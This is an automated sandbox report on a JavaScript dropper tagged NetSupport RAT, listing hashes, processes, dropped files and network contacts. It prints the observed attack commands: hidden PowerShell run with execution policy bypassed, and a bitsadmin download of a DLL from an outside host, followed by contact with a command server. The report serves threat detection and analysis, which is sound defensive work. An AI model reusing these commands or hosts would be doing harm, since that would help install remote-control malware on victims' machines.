Malware Analysis Report

2025-04-13 09:52

Sample ID 230709-x1skwagc3x
Target ave603jsjsjsjsjsjsjsjsjsj.js
SHA256 48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d
Tags
netsupport rat
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V6

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

48a8c57895c2cfdf13a402e669a9964f56128521404e47b4727672f8ca91a90d

Threat Level: Known bad

The file ave603jsjsjsjsjsjsjsjsjsj.js was found to be: Known bad.

Malicious Activity Summary

netsupport rat

NetSupport

Executes dropped EXE

Loads dropped DLL

Checks computer location settings

Enumerates physical storage devices

Download via BitsAdmin

Suspicious use of WriteProcessMemory

Suspicious use of FindShellTrayWindow

Suspicious behavior: EnumeratesProcesses

Suspicious use of AdjustPrivilegeToken

MITRE ATT&CK

Analysis: static1

Detonation Overview

Reported

2023-07-09 19:19

Signatures

N/A

Analysis: behavioral1

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win7-20230703-en

Max time kernel

39s

Max time network

43s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

Signatures

Enumerates physical storage devices

Download via BitsAdmin

dropper
Description Indicator Process Target
N/A N/A C:\Windows\system32\bitsadmin.exe N/A

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1

C:\Windows\system32\bitsadmin.exe

"C:\Windows\system32\bitsadmin.exe" /transfer MeDoW /download /priority normal https://virvatulishop.com/files/AudioCapture.dll C:\Users\Admin\AppData\RoamingOfficeStartupAudioCapture.dll

Network

Country Destination Domain Proto
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp

Files

memory/1720-60-0x000000001B2A0000-0x000000001B582000-memory.dmp

memory/1720-61-0x0000000002040000-0x0000000002048000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\wzt5yg9.ps1

MD5 d85c0eada7610417ac3448efa1975122
SHA1 0243c3ac3e03279f6abc4817906ab95d74c8c2f7
SHA256 7689232c0352a14f0ff0967d88e6964eddaf25e2d282f8484fa17abb3b486a37
SHA512 b3e627647589839f6383942a5db24d3b46fe0068027307eb6805e933ea481d550f8c59eab566dd9a62af1e8126efbd8416ad870da489623107415f2a8067c7d1

memory/1720-63-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-64-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-65-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-66-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-67-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-68-0x00000000025B0000-0x0000000002630000-memory.dmp

memory/1720-69-0x00000000025B0000-0x0000000002630000-memory.dmp

Analysis: behavioral2

Detonation Overview

Submitted

2023-07-09 19:19

Reported

2023-07-09 19:22

Platform

win10v2004-20230703-en

Max time kernel

143s

Max time network

148s

Command Line

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

Signatures

NetSupport

rat netsupport

Checks computer location settings

Description Indicator Process Target
Key value queried \REGISTRY\USER\S-1-5-21-1043950675-1972537973-2972532878-1000\Control Panel\International\Geo\Nation C:\Windows\system32\wscript.exe N/A

Executes dropped EXE

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Enumerates physical storage devices

Suspicious behavior: EnumeratesProcesses

Description Indicator Process Target
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
N/A N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeDebugPrivilege N/A C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe N/A
Token: SeSecurityPrivilege N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe N/A

Processes

C:\Windows\system32\wscript.exe

wscript.exe C:\Users\Admin\AppData\Local\Temp\ave603jsjsjsjsjsjsjsjsjsj.js

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe

"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass -WindowStyle hidden -File C:\Users\Admin\AppData\Local\Temp\ci6dzrr.ps1

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

"C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe"

Network

Country Destination Domain Proto
US 8.8.8.8:53 140.32.126.40.in-addr.arpa udp
US 8.8.8.8:53 95.221.229.192.in-addr.arpa udp
US 8.8.8.8:53 57.169.31.20.in-addr.arpa udp
US 8.8.8.8:53 virvatulishop.com udp
FI 5.44.245.24:443 virvatulishop.com tcp
US 8.8.8.8:53 24.245.44.5.in-addr.arpa udp
US 8.8.8.8:53 deperekanuki1.com udp
RU 5.42.74.53:5222 deperekanuki1.com tcp
US 8.8.8.8:53 geo.netsupportsoftware.com udp
GB 62.172.138.67:80 geo.netsupportsoftware.com tcp
US 8.8.8.8:53 53.74.42.5.in-addr.arpa udp
US 8.8.8.8:53 67.138.172.62.in-addr.arpa udp
US 8.8.8.8:53 86.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 206.23.85.13.in-addr.arpa udp
US 8.8.8.8:53 64.13.109.52.in-addr.arpa udp
US 8.8.8.8:53 254.5.248.8.in-addr.arpa udp
US 8.8.8.8:53 208.143.182.52.in-addr.arpa udp

Files

memory/3664-137-0x000001F8A7EB0000-0x000001F8A7ED2000-memory.dmp

C:\Users\Admin\AppData\Local\Temp\__PSScriptPolicyTest_qzjuzens.33u.ps1

MD5 d17fe0a3f47be24a6453e9ef58c94641
SHA1 6ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA256 96ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA512 5b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82

C:\Users\Admin\AppData\Local\Temp\ci6dzrr.ps1

MD5 d83dc9e78a9b12b1cda85e65346f50d1
SHA1 9435de2c91c3bad6ec6ee038d55aeb8c20abd48a
SHA256 a590116ad5c79bb6201ac6067101b388ae853dc8d40debd3d2cd9912f96cb94b
SHA512 c9d1192b65552e72c33c1c18f7e0e3f01a7ffa855bb56f0039a380753c002b521d203be4e9b0467ca008921e2ef52573df2ed5fd59d782639c52aad65af22a3d

memory/3664-148-0x000001F8A7FB0000-0x000001F8A7FC0000-memory.dmp

memory/3664-149-0x000001F8A7FB0000-0x000001F8A7FC0000-memory.dmp

memory/3664-150-0x000001F8A7FB0000-0x000001F8A7FC0000-memory.dmp

memory/3664-151-0x000001F8A7F50000-0x000001F8A7F64000-memory.dmp

memory/3664-152-0x000001F8A7F70000-0x000001F8A7F82000-memory.dmp

memory/3664-153-0x000001F8A7F40000-0x000001F8A7F4A000-memory.dmp

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.exe

MD5 45fe5531717cd1b9532cbb6a5daaeb3a
SHA1 cb908e267a08c37d7e184f47f788e82cca38f83e
SHA256 ab6a4ccb752858c8c6e8223cd3510503928c3f9816cc655f0033d86c15c28ed9
SHA512 5ce8ea56144345802342f618c51acdbcfef3349e81e145c200ff77e217e86556f833236d85caf6ff1c8d954370bbb88e9581d9b0807b530344a8e084ede60bcb

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.dll

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICL32.DLL

MD5 9c9302e75c25c2ba996efd89a1047205
SHA1 9e79627ff32d5abd3382b65a509baeb31c78a7f2
SHA256 beb7b9a9fb02b2ad9965364fd6769ea0d8b324049da86eedd406e1c3703502c1
SHA512 d120b380ecd937826ab992802d8aae85f747031d50c1f6421a6c5ac32871a08f1a9c612c41946dd0aeabc01b1737cae6a1de70f9af36020af2b679e556d54fa1

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\PCICHEK.DLL

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\MSVCR100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\msvcr100.dll

MD5 0e37fbfa79d349d672456923ec5fbbe3
SHA1 4e880fc7625ccf8d9ca799d5b94ce2b1e7597335
SHA256 8793353461826fbd48f25ea8b835be204b758ce7510db2af631b28850355bd18
SHA512 2bea9bd528513a3c6a54beac25096ee200a4e6ccfc2a308ae9cfd1ad8738e2e2defd477d59db527a048e5e9a4fe1fc1d771701de14ef82b4dbcdc90df0387630

C:\Users\Admin\AppData\RoamingOfficeStartup\pcicapi.dll

MD5 34dfb87e4200d852d1fb45dc48f93cfc
SHA1 35b4e73fb7c8d4c3fefb90b7e7dc19f3e653c641
SHA256 2d6c6200508c0797e6542b195c999f3485c4ef76551aa3c65016587788ba1703
SHA512 f5bb4e700322cbaa5069244812a9b6ce6899ce15b4fd6384a3e8be421e409e4526b2f67fe210394cd47c4685861faf760eff9af77209100b82b2e0655581c9b2

C:\Users\Admin\AppData\RoamingOfficeStartup\pcichek.dll

MD5 104b30fef04433a2d2fd1d5f99f179fe
SHA1 ecb08e224a2f2772d1e53675bedc4b2c50485a41
SHA256 956b9fa960f913cce3137089c601f3c64cc24c54614b02bba62abb9610a985dd
SHA512 5efcaa8c58813c3a0a6026cd7f3b34ad4fb043fd2d458db2e914429be2b819f1ac74e2d35e4439601cf0cb50fcdcafdcf868da328eaaeec15b0a4a6b8b2c218f

C:\Users\Admin\AppData\RoamingOfficeStartup\client32.ini

MD5 a252f22f61f960c54fa32ae0de7dd17c
SHA1 00fe1097e70f1f6307e6bc68f40d49abb01dd2d5
SHA256 a5be7a73bbed8ec4e1a7819289da5412fe9ddf628941aa3b35fbe7454f148618
SHA512 7998e6cd43853b77e38cfedf0b6081c2965c9facb891ebd9a33db0e39b71d683f218174d87f99d5ab22983632c4c319bd63ec9dcbf1cbc81a77e3053ae3f1593

C:\Users\Admin\AppData\RoamingOfficeStartup\NSM.LIC

MD5 b9956282a0fed076ed083892e498ac69
SHA1 d14a665438385203283030a189ff6c5e7c4bf518
SHA256 fcc6afd664a8045bd61c398be3c37a97536a199a48d277e11977f93868ae1acc
SHA512 7daa09113c0e8a36c91cc6d657c65851a20dff6b60ac3d2f40c5737c12c1613c553955f84d131ba2139959973fef9fc616ca5e968cb16c25acf2d4739eed87eb

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a

C:\Users\Admin\AppData\RoamingOfficeStartup\HTCTL32.DLL

MD5 c94005d2dcd2a54e40510344e0bb9435
SHA1 55b4a1620c5d0113811242c20bd9870a1e31d542
SHA256 3c072532bf7674d0c5154d4d22a9d9c0173530c0d00f69911cdbc2552175d899
SHA512 2e6f673864a54b1dcad9532ef9b18a9c45c0844f1f53e699fade2f41e43fa5cbc9b8e45e6f37b95f84cf6935a96fba2950ee3e0e9542809fd288fefba34ddd6a